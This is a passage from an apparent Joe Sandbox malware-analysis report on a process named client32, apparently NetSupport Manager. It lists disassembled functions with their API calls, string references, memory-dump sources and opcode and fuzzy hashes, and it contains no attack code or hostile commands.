                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetCloseHandle
                                                                                                                                        • API String ID: 199729137-3843628324
                                                                                                                                        • Opcode ID: ea7632ad564ca91891378c1b58539588b2d12b8fcd0d86ff6e74bbf9fc0f9cbe
                                                                                                                                        • Instruction ID: b4ab81d7b9a4c495e6e017cb7ae5eafad110de4830bc14e25eff5374b86e0d44
                                                                                                                                        • Opcode Fuzzy Hash: ea7632ad564ca91891378c1b58539588b2d12b8fcd0d86ff6e74bbf9fc0f9cbe
                                                                                                                                        • Instruction Fuzzy Hash: 8BE0D8329447249FC334DFA4D848A4AB7F8EF64761F00093BE555D7501D670E884CBD0
                                                                                                                                        Function 6890DC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 6890DC59
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _memset.LIBCMT ref: 6890DC82
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc_memset
                                                                                                                                        • String ID: Refcount.cpp
                                                                                                                                        • API String ID: 2365696598-3480236496
                                                                                                                                        • Opcode ID: 1ed1d57a6788c9204375bfb6674e4b272274889e8fd19d4c38b6093064ea9412
                                                                                                                                        • Instruction ID: 134533825349b4f500bce97b39c41ca7445a62acfcb7cbd5bc8bd4b09a373ab0
                                                                                                                                        • Opcode Fuzzy Hash: 1ed1d57a6788c9204375bfb6674e4b272274889e8fd19d4c38b6093064ea9412
                                                                                                                                        • Instruction Fuzzy Hash: 5FE0C22BBC813837C11111EA3C06EAFBA5C8FF2DE9F850031FA0CA6241E681E95141E6
                                                                                                                                        Function 689280A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameName::
                                                                                                                                        • String ID: {flat}
                                                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                                                        • Opcode ID: 77e9e166760ee4ab6313e34037be2d8b612fd8c0acf33d7d66b367166ec23a8d
                                                                                                                                        • Instruction ID: 87656247b995a38f0f6e390b54c104fcc995869d4344bdcec422fbe25fe07127
                                                                                                                                        • Opcode Fuzzy Hash: 77e9e166760ee4ab6313e34037be2d8b612fd8c0acf33d7d66b367166ec23a8d
                                                                                                                                        • Instruction Fuzzy Hash: 7BF0ED311D8208EFCB14CF58E468BE93BA8DB8632AF448080E55D1F75BC732D881CB91
                                                                                                                                        Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        • m_hWnd, xrefs: 11001126
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                        • API String ID: 1604732272-2830328467
                                                                                                                                        • Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                        • Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
                                                                                                                                        • Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                        • Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394
                                                                                                                                        Function 6890BB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: IsA()$NSMString.cpp
                                                                                                                                        • API String ID: 269201875-2362537096
                                                                                                                                        • Opcode ID: ac9e53ea87c1bb925664d041b8a8135cf33c595f177b4b1d251565a718b90de4
                                                                                                                                        • Instruction ID: 0abe5fb1572b5f092c47f93934683c009e60f6b32fb6f4147bc3edbea9ca91f6
                                                                                                                                        • Opcode Fuzzy Hash: ac9e53ea87c1bb925664d041b8a8135cf33c595f177b4b1d251565a718b90de4
                                                                                                                                        • Instruction Fuzzy Hash: ACD0A77BC482306BD9245B9C7C03D6D33984F99119FC50869B59C67104E730DC5001D2
                                                                                                                                        Function 6890DAC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6890DAE4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event
                                                                                                                                        • String ID: Refcount.cpp$this->hReadyEvent
                                                                                                                                        • API String ID: 4201588131-2118820724
                                                                                                                                        • Opcode ID: 7d038ac4ab8e9f665326ac6593b94cfd23ae4c9ffc1162079433af3dbd1d1c25
                                                                                                                                        • Instruction ID: bf474cc3849a14dca653b9aa58cd059460db38dbdd4ce1281864f923729dfd4f
                                                                                                                                        • Opcode Fuzzy Hash: 7d038ac4ab8e9f665326ac6593b94cfd23ae4c9ffc1162079433af3dbd1d1c25
                                                                                                                                        • Instruction Fuzzy Hash: 8FD012319CC630FFC7309AA8B809BDA37A89F84356F414639F10A62144D6E4E84ACBD4